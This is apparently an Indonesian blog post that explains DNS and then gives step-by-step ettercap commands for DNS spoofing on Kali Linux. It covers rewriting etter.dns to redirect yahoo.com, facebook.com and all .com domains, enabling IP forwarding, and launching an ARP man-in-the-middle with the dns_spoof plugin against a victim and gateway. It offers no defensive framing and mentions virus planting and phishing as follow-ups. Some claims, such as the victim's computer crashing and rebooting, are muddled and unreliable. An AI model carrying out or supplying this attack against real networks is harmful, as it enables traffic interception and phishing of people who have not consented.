DNS Spoofing
DNS adalah Domain Name Server, yaitu server yang digunakan untuk mengetahui IP Address suatu host lewat host name-nya. Dalam dunia internet, komputer berkomunikasi satu sama lain dengan mengenali IP Address-nya. Namun bagi manusia tidak mungkin menghafalkan IP address tersebut, manusia lebih mudah menghapalkan kata-kata seperti www.yahoo.com, www.google.com, atau www.facebook.com. DNS berfungsi untuk mengkonversi nama yang bisa terbaca oleh manusia ke dalam IP addresshost yang bersangkutan untuk dihubungi.Jadi ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker.
Langkah-langkah melakukan DNS spoofing adalah :
download applikasi nya bisa ettercap bisa juga dengan cain&able yang anda bisa dapatkan di internet
ettercap :
- OS linux kali linux/windows.
- Disi di jelaskan menggunakan kali linux.
- Buka terminal dan kettik ettercap –help akan menampilkan perintah-perintah panduan ettercap.
- Rubah setting DNS yang ada di ettercap dengan cara ketik “ nano
/etc/ettercap/etter.dns” hapus semua nya dan isikan settingan berikut :
www.yahoo.com A [ip-address target]
www.facebook.com A [ip-address target]
*.com A [ip-address target]
NB : itu akan merubah koneksi facebook.com dan yahoo.com mengarah ke ip target dan yang terjadi ip terget akan down dan bisa bisa komputer nya over dan reboot sendiri. Ada beberapa fariasi serangan yang di lakukan dengan DNS spofing. Seperti penanaman virus dan phising yang belom di bahas saat ini. Lanjut langkah berikutnya
5. Masih di jendela terminal dan ketikan “ ettercap -T -q -i [wlan0/interface-anda] -P dns_spoof -M ARP-REMOTE /ip-target/ /getaway/ enter , sebelum melakukan ini anda di haruskan untuk mengaktifkan ip forwarding dengan cara : “ echo 1 > /proc/sys/net/ipv4/ip_forward “ dan enter
selamat membaca semoga bermanfaat.
Tidak ada komentar:
Posting Komentar